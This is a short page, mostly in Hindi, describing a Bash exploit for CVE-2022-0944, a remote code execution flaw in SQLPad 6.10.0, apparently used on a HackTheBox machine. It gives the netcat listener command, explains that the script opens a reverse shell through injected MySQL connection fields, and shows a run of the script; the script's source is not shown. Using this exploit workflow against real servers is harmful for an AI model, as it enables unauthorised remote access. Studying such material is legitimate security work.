
Refurbish
यह Bash स्क्रिप्ट SQLPad 6.10.0 में एक RCE कमजोरी का शोषण करती है, जो हमलावर को SQLPad के MySQL डेटाबेस कनेक्शन सेटिंग्स में host और database फ़ील्ड्स का दुरुपयोग करके दूरस्थ कोड निष्पादन (RCE) प्राप्त करने की अनुमति देती है। यह शोषण Node.js में child_process मॉड्यूल की SQLPad की अस्वच्छ हैंडलिंग का लाभ उठाकर मनमाना कमांड निष्पादित करता है, और अंततः हमलावर की मशीन पर एक रिवर्स शेल खोलता है।
nc -lvnp 9001 के साथ एक लिसनर सक्रिय है।┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com):
x.example.com
Please provide your IP address (e.g., 10.10.16.3):
0.0.0.0
Exploit sent. If everything went well, check your listener for a connection on port 9001.
यह कोड केवल शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। इस शोषण का उपयोग केवल अनुमति से करें।